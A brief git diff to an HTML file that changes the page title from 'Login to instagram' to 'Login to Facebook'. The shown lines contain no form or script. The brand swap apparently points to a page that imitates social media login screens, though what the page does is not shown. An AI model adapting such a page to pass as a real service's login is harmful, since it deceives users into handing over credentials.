--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
                  <link rel="stylesheet" href="w3.css">
                  <meta charset="UTF-8">
                  <meta name="viewport" content="width=device-width, initial-scale=1.0">
-                 <title>Login to instagram</title>
+                 <title>Login to Facebook</title>
           
                  <style type="text/css" id="operaUserStyle">
                  body{
